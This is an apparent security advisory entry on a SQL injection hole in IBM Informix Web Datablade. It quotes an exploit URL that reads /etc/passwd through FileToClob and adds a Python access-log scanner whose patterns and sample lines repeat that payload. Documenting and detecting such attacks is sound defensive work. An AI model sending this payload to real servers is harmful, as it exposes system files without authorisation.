IBM Informix Web Datablade Page Request SQL Injection Vulnerability

A number of exploits are provided in the advisory released by Simon Lodal <simonl@mirrormind.com>, including the following, which will display /etc/passwd:

http://victim.com/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html
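
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it scans web-server access log lines for a quote combined with UNION SELECT or FileToClob in the URL path. The combined log format, the sample lines and all function names are assumptions constructed for illustration; FileToBlob is included as the BLOB counterpart of FileToClob.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+) HTTP/\d\.\d"')

# Indicators drawn from the request shown above.
INDICATORS = {
    "quote_in_path": re.compile(r"'"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "file_function": re.compile(r"\b(filetoclob|filetoblob)\s*\(", re.I),
    "sql_comment": re.compile(r"--"),
}

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding is normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return the sorted indicator names found in the URL path of one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # The flaw is in the page-request path, so only the part before '?' is checked.
    path = decode_fully(m.group("target").split("?", 1)[0])
    return sorted(name for name, rx in INDICATORS.items() if rx.search(path))

def is_suspicious(line):
    """A lone quote is noisy (o'brien.html); require SQL syntax alongside it."""
    hits = inspect_line(line)
    return "quote_in_path" in hits and bool({"union_select", "file_function"} & set(hits))

# Constructed sample log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /site/products.html HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /site/o\'brien.html HTTP/1.1" 404 312',
    "192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] \"GET /site/'%20UNION%20ALL%20SELECT%20"
    "FileToClob('/etc/passwd','server')::html,0%20FROM%20sysusers%20WHERE%20username"
    "%20=%20USER%20--/.html HTTP/1.0\" 200 1843",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(is_suspicious(entry), inspect_line(entry))
```

A 200 response on a flagged line is worth prioritising during triage, since it suggests the server processed the request rather than rejecting it.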


 

Copyright 2010, SecurityFocus